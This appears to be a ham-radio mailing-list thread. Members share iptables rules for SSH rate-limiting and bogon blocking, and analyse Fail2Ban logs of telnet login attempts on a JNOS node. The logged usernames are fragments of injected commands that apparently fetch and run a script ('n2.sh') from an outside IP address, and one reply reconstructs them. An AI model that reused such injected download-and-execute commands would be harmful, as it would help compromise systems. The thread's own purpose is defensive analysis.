Pedro,
I use the following iptables rules on my router (this will work for any console-based connection using TCP):
# DROPS MULTIPLE SSH CONNECTIONS FROM SAME IP iptables -t filter -I FORWARD -p tcp --syn --dport 22 -i tunl0 -m connlimit --connlimit-above 5 -j DROP
# DROPS MULTIPLE SSH ATTEMPTS FROM SAME IP WITHIN FIVE MINUTES iptables -t filter -I FORWARD -p tcp --dport 22 -i tunl0 -m state --state NEW -m recent --name sshconnect --update --seconds 300 --hitcount 5 -j DROP
iptables -t filter -I FORWARD -p tcp --dport 22 -i tunl0 -m state --state NEW -m recent --name sshconnect --set
The first rule drops any connections greater then five. The last two rules mark and drop more than five attempts from the same IP, for a period of five minutes. You may wish to increase the time frame. I've also added rules to block IPs that attempt to connect (or portscan) on certain TCP and UDP ports (3389/tcp, 123/udp and 161/udp are common, for example) for which I not post services as available to the AMPR Community or the Public Internet connection.
In essence, even if an unauthorized person discovered the the port without being firewalled by the portscan rule, they only get 5 chances, with up to 5 concurrent connections at any given 5 minute interval (the amount of attempts vary by implementation of server and client; but once portscanned or disconnected from a given series of attempts, it counts at one connection). Each reattempt after 5, restarts the 5 minute clock.
I also block Bogon IP addresses from entering tunl0:
# DROPS BOGONS ENTERING AMPRNet # SEE http://www.team-cymru.org/Services/Bogons/bogon-bn-nonagg.txt iptables -t raw -I PREROUTING -s 0.0.0.0/8 -i tunl0 -j DROP iptables -t raw -I PREROUTING -s 10.0.0.0/8 -i tunl0 -j DROP iptables -t raw -I PREROUTING -s 100.64.0.0/10 -i tunl0 -j DROP iptables -t raw -I PREROUTING -s 127.0.0.0/8 -i tunl0 -j DROP iptables -t raw -I PREROUTING -s 169.254.0.0/16 -i tunl0 -j DROP iptables -t raw -I PREROUTING -s 172.16.0.0/12 -i tunl0 -j DROP iptables -t raw -I PREROUTING -s 192.0.0.0/24 -i tunl0 -j DROP iptables -t raw -I PREROUTING -s 192.0.2.0/24 -i tunl0 -j DROP iptables -t raw -I PREROUTING -s 192.168.0.0/16 -i tunl0 -j DROP iptables -t raw -I PREROUTING -s 198.18.0.0/15 -i tunl0 -j DROP iptables -t raw -I PREROUTING -s 198.51.100.0/24 -i tunl0 -j DROP iptables -t raw -I PREROUTING -s 203.0.113.0/24 -i tunl0 -j DROP iptables -t raw -I PREROUTING -s 224.0.0.0/4 -i tunl0 -j DROP iptables -t raw -I PREROUTING -s 240.0.0.0/4 -i tunl0 -j DROP
I should note that in addition to this, console-based connections that I use for administration only are moved to non-standard ports. So I added another layer of protection with Security Through Obscurity (hence a portscan rule).
73,
Lynwood KB3VWG
For those who monitor their logs, I've seen a spike in hack attempts to login to my JNOS via telnet, only there is something odd regarding the username they're using when trying to login.
I'm using Fail2Ban in combination with Shorewall, and my Fail2Ban jail rule caught these.
(Note the odd login names used in parenthesis below .)
======================= [Fail2Ban] jnos: banned 124.107.194.191 Mon Jun 13 15:09:36 2016 124.107.194.191:42351 - MBOX (root) bad login Mon Jun 13 15:09:36 2016 124.107.194.191:42351 - MBOX (46.183.217.145 -c ge) bad login
[Fail2Ban] jnos: banned 119.93.93.191 Mon Jun 13 15:18:40 2016 119.93.93.191:43376 - MBOX (root) bad login Mon Jun 13 15:18:41 2016 119.93.93.191:43376 - MBOX (46.183.217.145 -c ge) bad login
[Fail2Ban] jnos: banned 181.120.124.254 Tue Jun 14 15:26:20 2016 181.120.124.254:3982 - MBOX (root) bad login Tue Jun 14 15:26:26 2016 181.120.124.254:3982 - MBOX (n2.sh -g 185.103.109) bad login
[Fail2Ban] jnos: banned 119.92.147.216 Tue Jun 14 16:46:50 2016 119.92.147.216:49692 - MBOX (root) bad login Tue Jun 14 16:47:00 2016 119.92.147.216:49692 - MBOX (echo -e 'teot') bad login
[Fail2Ban] jnos: banned 119.93.93.103 Tue Jun 14 19:44:39 2016 119.93.93.103:50702 - MBOX (root) bad login Tue Jun 14 19:44:43 2016 119.93.93.103:50702 - MBOX (08.67.1.175 -c get t) bad login ==========================
Anyone know what exploit someone is trying to probe for when using a login name like "n2.sh -g 185.103.109" ??
Just curious if anyone knows the exact intent of what they're trying to exploit so I can research and reinforce as needed.
I suspect this is happening 44 system wide to those with telnet options.
Bill Lewis - KG6BAJ
--- This email has been checked for viruses by Avast antivirus software. https://www.avast.com/antivirus
Bill,
First, I noticed:
- All the source IP addresses are allocated to ISPs in the Philippines - Piecing the information together, I get something more like:
# get 46.183.217.145 -c n2.sh # n2.sh -g 185.103.109<THIS OCTET IS MISSING FROM THE COMMENTS> # echo -e 'teot'
CHECK THAT YOU DO NOT FIND A FILE NAMED n2.sh ON YOUR SYSTEM!?!?
I surmise the malicious person is:
- attempting to run 'get' and other commands on your local host; - and/or trying to send commands through your host - to a 3rd compromised system
When did you begin running fail2ban and firewalls, for a while, or recently?
73,
- Lynwood KB3VWG
Bill,
Also 46.183.217.145 is in Latvia. It is a webserver; but n2.sh is no longer present.
- KB3VWG
Bill et al;
On Tue, 2016-06-14 at 23:06 -0700, William Lewis wrote:
[Fail2Ban] jnos: banned 124.107.194.191 Mon Jun 13 15:09:36 2016 124.107.194.191:42351 - MBOX (root) bad login Mon Jun 13 15:09:36 2016 124.107.194.191:42351 - MBOX (46.183.217.145 -c ge) bad login
I don't know if Maiko has a limit as to his login but it almost appears to me as if the botnets are trying to execute a longer command. A search on n2.sh comes up empty.
-
Brian -
lleachii@aol.com -
William Lewis